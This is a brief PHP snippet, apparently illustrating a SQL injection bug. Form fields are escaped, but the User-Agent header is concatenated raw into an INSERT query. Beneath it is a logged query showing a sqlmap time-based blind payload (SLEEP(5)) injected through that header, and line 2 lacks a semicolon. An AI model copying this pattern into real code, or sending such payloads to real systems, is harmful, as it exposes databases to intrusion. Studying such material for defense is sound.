<?php$UA = $_SERVER['HTTP_USER_AGENT']$DB_USER = "user";$DB_PASS = "p@ss";$D

1. <?php
2. $UA = $_SERVER['HTTP_USER_AGENT']
3. $DB_USER = "user";
4. $DB_PASS = "p@ss";
5. $DB_NAME = "vuln_db";
6. $DB_HOST = "localhost";
7. $conn = mysqli_connect($DB_HOST,$DB_USER,$DB_PASS,$DB_NAME);
8. $USER = mysqli_real_escape_string($conn,$_POST['user']);
9. $PSWD = mysqli_real_escape_string($conn,$_POST['pass']);
10. $sqlstatement = "INSERT INTO logs (lid,user,pass,useragent) VALUES(NULL,'" . $USER . "','" . $PSWD . "','" . $UA . "')";
11. ?>
12.  
13. INSERT INTO logs (lid,user,pass,useragent) VALUES(NULL,'FakeUser','FakePass','sqlmap/1.2.6#stable (http://sqlmap.org)' AND (SELECT * FROM (SLEEP(5)))vsaW) AND 'RVpx'='RVpx')
14.  
15. mysql Ver 15.1 Distrib 10.1.26-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2